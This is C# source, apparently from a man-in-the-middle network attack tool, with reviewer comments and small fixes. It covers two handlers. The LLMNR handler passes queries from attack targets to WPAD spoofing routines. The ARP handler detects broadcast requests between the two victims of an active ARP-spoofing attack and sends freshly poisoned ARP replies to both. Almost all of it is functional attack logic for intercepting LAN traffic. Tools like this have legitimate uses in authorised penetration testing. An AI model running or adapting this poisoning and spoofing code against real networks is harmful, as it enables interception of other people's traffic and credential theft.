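/// <summary>
/// Inspects a captured frame for LLMNR traffic (UDP port 5355).
/// Answers seen over IPv4 are used to record or refresh a neighbor's computer name;
/// queries over IPv4 or IPv6 are handed to the matching WPAD attack instance when
/// their source address equals the <c>t2</c> address of an attack in the Attacking state.
/// </summary>
/// <remarks>
/// Everything recorded here (computer name, IP address, MAC) is copied from the
/// captured frame without any authentication, so an entry in the neighbor table is
/// only as trustworthy as whoever sent the LLMNR answer.
/// </remarks>
/// <param name="packet">Captured frame. Frames that are not Ethernet, or that do not
/// carry a decoded UDP datagram two layers down, are ignored.</param>
private void AnalyzeLLMNR(Packet packet)
{
    const int LlmnrPort = 5355;

    EthernetPacket ethernet = packet as EthernetPacket;
    if (ethernet == null)
    {
        return;
    }

    // Fix: the original dereferenced packet.PayloadPacket.PayloadPacket unconditionally.
    // A frame whose network layer was not decoded would leave PayloadPacket null and
    // throw here, so bail out instead.
    Packet network = ethernet.PayloadPacket;
    if (network == null)
    {
        return;
    }

    // Applies to both IPv4 and IPv6 frames.
    UdpPacket udp = network.PayloadPacket as UdpPacket;
    if (udp == null)
    {
        return;
    }

    // LLMNR answers: the computer name can be learned from these.
    // NOTE(review): only IPv4 answers are parsed here, although queries are handled
    // for IPv6 too - confirm whether that asymmetry is intentional.
    if (udp.SourcePort == LlmnrPort && ethernet.Type == EthernetPacketType.IpV4)
    {
        LLMNR.LLMNRAnswer answer = new LLMNR.LLMNRAnswer(udp.PayloadData);

        // The original comment mentions PTR or A answers; the check visible here only
        // tests isPtrResponse. Fix: a null name is now rejected as well as an empty one,
        // so an existing neighbor name is never overwritten with null.
        if (answer.isPtrResponse == true && !string.IsNullOrEmpty(answer.computerName))
        {
            Neighbor neighbor = Program.CurrentProject.data.GetNeighbor(ethernet.SourceHwAddress);
            if (neighbor == null)
            {
                // First sighting of this MAC: create the entry and announce it.
                neighbor = new Neighbor();
                neighbor.computerName = answer.computerName;
                neighbor.AddIP(answer.ipAddress);
                neighbor.physicalAddress = ethernet.SourceHwAddress;
                Program.CurrentProject.data.AddNeighbor(neighbor);
                NewNeighbor(this, new NeighborEventArgs(neighbor));
            }
            else
            {
                // Known MAC: refresh the name and store the entry again.
                neighbor.computerName = answer.computerName;
                Program.CurrentProject.data.AddNeighbor(neighbor);
            }
        }
    }

    // LLMNR queries. (The original comment on the loops below was copied from the ARP
    // handler and did not describe this code.)
    if (udp.DestinationPort == LlmnrPort)
    {
        if (ethernet.Type == EthernetPacketType.IpV4)
        {
            SynchronizedCollection<Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();

            // For every WPAD-over-IPv4 attack in the Attacking state whose t2 address is
            // the source of this query, let WpadIPv4Attack build the response.
            foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv4 && A.attackStatus == AttackStatus.Attacking))
            {
                MitmAttack mitmAtt = (MitmAttack)attk;
                if (((IPv4Packet)network).SourceAddress.Equals(mitmAtt.t2.ip))
                {
                    WpadIPv4Attack.Instance.GenerateLLMNRResponse(packet);
                }
            }
        }
        else if (ethernet.Type == EthernetPacketType.IpV6)
        {
            SynchronizedCollection<Attack> lstAttacks = Program.CurrentProject.data.GetAttacks();

            // Same as above for WPAD-over-IPv6 attacks.
            foreach (Attack attk in lstAttacks.Where(A => A.attackType == AttackType.WpadIPv6 && A.attackStatus == AttackStatus.Attacking))
            {
                MitmAttack mitmAtt = (MitmAttack)attk;
                if (((IPv6Packet)network).SourceAddress.Equals(mitmAtt.t2.ip))
                {
                    WpadIPv6Attack.Instance.GenerateLLMNRResponse(packet);
                }
            }
        }
    }
}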
/// <summary>
/// Handles a captured ARP frame. Frames addressed to the local MAC are used to record
/// the sender in the neighbor table; broadcast ARP requests are matched against the
/// attacks currently in the Attacking state and, on a match, poisoned ARP packets are
/// generated and sent again. <c>OnNewARP</c> is raised for every Ethernet/ARP frame.
/// </summary>
/// <remarks>
/// ARP carries no authentication: the sender MAC/IP pair stored in the neighbor table
/// is taken from the frame as-is.
/// NOTE(review): judging by the helper's name, the packets sent from the broadcast
/// branch are ARP responses emitted right after a broadcast request - confirm against
/// GenerateResponseArpPoison.
/// </remarks>
/// <param name="packet">Captured frame. Ignored unless it is an Ethernet frame whose
/// payload is an ARP packet.</param>
private void AnalyzeARP(Packet packet)
{
    ARPPacket arp = packet.PayloadPacket as ARPPacket;
    if (arp == null)
    {
        return;
    }

    EthernetPacket frame = packet as EthernetPacket;
    if (frame == null)
    {
        return;
    }

    PhysicalAddress destination = frame.DestinationHwAddress;

    if (destination.Equals(localPhysicalAddress))
    {
        // The frame is addressed to our own MAC: learn the sender.
        PhysicalAddress senderMac = arp.SenderHardwareAddress;
        IPAddress senderAddress = arp.SenderProtocolAddress;

        Neighbor known = Program.CurrentProject.data.GetNeighbor(senderMac);
        if (known != null)
        {
            // Already in the table: add this IP only if the neighbor does not have it yet.
            if (!known.ExistsIP(senderAddress))
            {
                known.AddIP(senderAddress);
                Program.CurrentProject.data.AddNeighbor(known);
            }
        }
        else
        {
            // Unknown MAC: create the neighbor and announce it.
            Neighbor created = new Neighbor();
            created.physicalAddress = senderMac;
            created.AddIP(senderAddress);
            Program.CurrentProject.data.AddNeighbor(created);
            NewNeighbor(this, new NeighborEventArgs(created));
        }
    }
    else if (destination.Equals(PhysicalAddress.Parse("FF-FF-FF-FF-FF-FF")) && arp.Operation == ARPOperation.Request)
    {
        // Broadcast ARP request: if the two hosts resolving each other are both ends of
        // an active man-in-the-middle attack, their ARP tables are poisoned again.
        IPAddress senderIp = arp.SenderProtocolAddress;
        IPAddress targetIp = arp.TargetProtocolAddress;

        SynchronizedCollection<Attack> attacks = Program.CurrentProject.data.GetAttacks();

        foreach (Attack attack in attacks)
        {
            bool relevantType = attack.attackType == AttackType.ARPSpoofing
                                || attack.attackType == AttackType.InvalidMacSpoofIpv4;
            if (!relevantType || attack.attackStatus != AttackStatus.Attacking)
            {
                continue;
            }

            MitmAttack mitm = attack as MitmAttack;
            if (mitm != null)
            {
                bool involvesFirst = mitm.t1.ip.Equals(senderIp) || mitm.t1.ip.Equals(targetIp);
                if (involvesFirst && (mitm.t2.ip.Equals(senderIp) || mitm.t2.ip.Equals(targetIp)))
                {
                    // Sent to both ends of the attack, although strictly only the host
                    // that issued the request would need it.
                    EthernetPacket towardsSecond = Attacks.ARPSpoofing.GenerateResponseArpPoison(
                        device.Interface.MacAddress, mitm.t2.mac, mitm.t2.ip, mitm.t1.ip);
                    Program.CurrentProject.data.SendPacket(towardsSecond);

                    EthernetPacket towardsFirst = Attacks.ARPSpoofing.GenerateResponseArpPoison(
                        device.Interface.MacAddress, mitm.t1.mac, mitm.t1.ip, mitm.t2.ip);
                    Program.CurrentProject.data.SendPacket(towardsFirst);
                }

                continue;
            }

            InvalidMacSpoofAttackIpv4Attack invalidMac = attack as InvalidMacSpoofAttackIpv4Attack;
            if (invalidMac != null)
            {
                // No sender/target match is required for this attack type.
                EthernetPacket poisoned = Attacks.ARPSpoofing.GenerateResponseArpPoison(
                    device.Interface.MacAddress, invalidMac.t2.mac, invalidMac.t2.ip, invalidMac.t1.ip);
                Program.CurrentProject.data.SendPacket(poisoned);
            }
        }
    }

    // Raised for every ARP frame, whichever branch ran above.
    OnNewARP(new ArpEventArgs(packet));
}